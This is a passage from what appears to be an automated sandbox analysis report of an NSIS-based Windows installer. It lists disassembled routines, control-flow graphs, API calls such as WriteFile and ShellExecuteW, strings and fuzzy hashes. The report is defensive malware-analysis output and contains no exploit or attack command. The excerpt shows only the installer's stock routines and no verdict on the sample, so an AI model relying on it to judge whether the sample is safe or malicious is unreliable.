                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                          • String ID: %SenateRoof%$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                          • API String ID: 4286501637-3060857477
                                                          • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                          • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                          • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                          • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 633 403733-403739 609->633 610->607 638 40376b-40377c 610->638 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 618 4036c7-4036cb 613->618 619 40364d-403661 call 405e0c 613->619 614->607 622 4036d5-4036db 618->622 623 4036cd-4036d4 call 4032d2 618->623 619->622 636 403663-40366a 619->636 629 4036ea-4036f4 622->629 630 4036dd-4036e7 call 407281 622->630 623->622 629->602 637 4036fa 629->637 630->629 633->607 633->610 636->622 640 40366c-403673 636->640 637->600 641 403784-403787 638->641 642 40377e 638->642 640->622 644 403675-40367c 640->644 643 40378a-403792 641->643 642->641 643->643 645 403794-4037af SetFilePointer call 405e0c 643->645 644->622 646 40367e-403685 644->646 650 4037b4 645->650 646->622 647 403687-4036a7 646->647 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->637 651->652 652->622 653 4036c3-4036c5 652->653 653->622
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00403598
                                                          • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                            • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                            • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                          • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                          Strings
                                                          • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                          • Inst, xrefs: 0040366C
                                                          • soft, xrefs: 00403675
                                                          • Null, xrefs: 0040367E
                                                          • Error launching installer, xrefs: 004035D7
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                          • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 4283519449-527102705
                                                          • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                          • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                          • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                          • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 654 40337f-403396 655 403398 654->655 656 40339f-4033a7 654->656 655->656 657 4033a9 656->657 658 4033ae-4033b3 656->658 657->658 659 4033c3-4033d0 call 403336 658->659 660 4033b5-4033be call 403368 658->660 664 4033d2 659->664 665 4033da-4033e1 659->665 660->659 666 4033d4-4033d5 664->666 667 4033e7-403407 GetTickCount call 4072f2 665->667 668 403518-40351a 665->668 669 403539-40353d 666->669 680 403536 667->680 682 40340d-403415 667->682 670 40351c-40351f 668->670 671 40357f-403583 668->671 673 403521 670->673 674 403524-40352d call 403336 670->674 675 403540-403546 671->675 676 403585 671->676 673->674 674->664 689 403533 674->689 678 403548 675->678 679 40354b-403559 call 403336 675->679 676->680 678->679 679->664 691 40355f-403572 WriteFile 679->691 680->669 685 403417 682->685 686 40341a-403428 call 403336 682->686 685->686 686->664 692 40342a-403433 686->692 689->680 693 403511-403513 691->693 694 403574-403577 691->694 695 403439-403456 call 407312 692->695 693->666 694->693 696 403579-40357c 694->696 699 40350a-40350c 695->699 700 40345c-403473 GetTickCount 695->700 696->671 699->666 701 403475-40347d 700->701 702 4034be-4034c2 700->702 703 403485-4034b6 MulDiv wsprintfW call 404f72 701->703 704 40347f-403483 701->704 705 4034c4-4034c7 702->705 706 4034ff-403502 702->706 712 4034bb 703->712 704->702 704->703 709 4034e7-4034ed 705->709 710 4034c9-4034db WriteFile 705->710 706->682 707 403508 706->707 707->680 711 4034f3-4034f7 709->711 710->693 713 4034dd-4034e0 710->713 711->695 715 4034fd 711->715 712->702 713->693 714 4034e2-4034e5 713->714 714->711 715->680
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 004033E7
                                                          • GetTickCount.KERNEL32 ref: 00403464
                                                          • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                          • wsprintfW.USER32 ref: 004034A4
                                                          • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                          • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CountFileTickWrite$wsprintf
                                                          • String ID: ... %d%%$P1B$X1C$X1C
                                                          • API String ID: 651206458-1535804072
                                                          • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                          • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                          • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                          • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 716 404f72-404f85 717 405042-405044 716->717 718 404f8b-404f9e 716->718 719 404fa0-404fa4 call 406805 718->719 720 404fa9-404fb5 lstrlenW 718->720 719->720 722 404fd2-404fd6 720->722 723 404fb7-404fc7 lstrlenW 720->723 726 404fe5-404fe9 722->726 727 404fd8-404fdf SetWindowTextW 722->727 724 405040-405041 723->724 725 404fc9-404fcd lstrcatW 723->725 724->717 725->722 728 404feb-40502d SendMessageW * 3 726->728 729 40502f-405031 726->729 727->726 728->729 729->724 730 405033-405038 729->730 730->724
                                                          APIs
                                                          • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                          • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                          • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                          • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                            • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2740478559-0
                                                          • Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                          • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                          • Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
                                                          • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 731 401eb9-401ec4 732 401f24-401f26 731->732 733 401ec6-401ec9 731->733 734 401f53-401f7b GlobalAlloc call 406805 732->734 735 401f28-401f2a 732->735 736 401ed5-401ee3 call 4062a3 733->736 737 401ecb-401ecf 733->737 748 4030e3-4030f2 734->748 749 402387-40238d GlobalFree 734->749 739 401f3c-401f4e call 406009 735->739 740 401f2c-401f36 call 4062a3 735->740 752 401ee4-402702 call 406805 736->752 737->733 741 401ed1-401ed3 737->741 739->749 740->739 741->736 745 401ef7-402e50 call 406009 * 3 741->745 745->748 749->748 764 402708-40270e 752->764 764->748
                                                          APIs
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • GlobalFree.KERNELBASE(0067E910), ref: 00402387
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FreeGloballstrcpyn
                                                          • String ID: %SenateRoof%$Exch: stack < %d elements$Pop: stack empty
                                                          • API String ID: 1459762280-1304504562
                                                          • Opcode ID: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                          • Instruction ID: ae7cb1f2c63b60d7baa415153617f8c61fd22799b34192a347ea6a0a5f6d971a
                                                          • Opcode Fuzzy Hash: 1ca185eeaafbead47595a1cc0f367f8cfd746e673960b0814e4cdcb04772ee17
                                                          • Instruction Fuzzy Hash: 4721D172601105EBE710EB95DD81A6F77A8EF44318B21003FF542F32D1EB7998118AAD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 766 4022fd-402325 call 40145c GetFileVersionInfoSizeW 769 4030e3-4030f2 766->769 770 40232b-402339 GlobalAlloc 766->770 770->769 771 40233f-40234e GetFileVersionInfoW 770->771 773 402350-402367 VerQueryValueW 771->773 774 402384-40238d GlobalFree 771->774 773->774 776 402369-402381 call 405f51 * 2 773->776 774->769 776->774
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                          • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                          • VerQueryValueW.VERSION(?,00408838,?,?,?,?,?,00000000), ref: 00402360
                                                            • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                          • GlobalFree.KERNELBASE(0067E910), ref: 00402387
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 3376005127-0
                                                          • Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                          • Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
                                                          • Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
                                                          • Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 782 402b23-402b37 GlobalAlloc 783 402b39-402b49 call 401446 782->783 784 402b4b-402b6a call 40145c WideCharToMultiByte lstrlenA 782->784 789 402b70-402b73 783->789 784->789 790 402b93 789->790 791 402b75-402b8d call 405f6a WriteFile 789->791 792 4030e3-4030f2 790->792 791->790 796 402384-40238d GlobalFree 791->796 796->792
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
                                                          • WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
                                                          • lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
                                                          • WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
                                                          • String ID:
                                                          • API String ID: 2568930968-0
                                                          • Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                          • Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
                                                          • Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
                                                          • Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 799 402713-40273b call 406009 * 2 804 402746-402749 799->804 805 40273d-402743 call 40145c 799->805 807 402755-402758 804->807 808 40274b-402752 call 40145c 804->808 805->804 809 402764-40278c call 40145c call 4062a3 WritePrivateProfileStringW 807->809 810 40275a-402761 call 40145c 807->810 808->807 810->809
                                                          APIs
                                                            • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: PrivateProfileStringWritelstrcpyn
                                                          • String ID: %SenateRoof%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                          • API String ID: 247603264-2402012953
                                                          • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                          • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                          • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                          • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 906 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 917 402223-4030f2 call 4062a3 906->917 918 40220d-40221b call 4062a3 906->918 918->917
                                                          APIs
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                            • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                            • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                            • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                            • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                          • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          Strings
                                                          • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                          • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                          • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                          • API String ID: 3156913733-2180253247
                                                          • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                          • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                          • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                          • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405E9D
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371538115.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371565953.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1371691960.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: nsa
                                                          • API String ID: 1716503409-2209301699
                                                          • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                          • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                          • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                            • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                            • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1371509946.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1371483010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
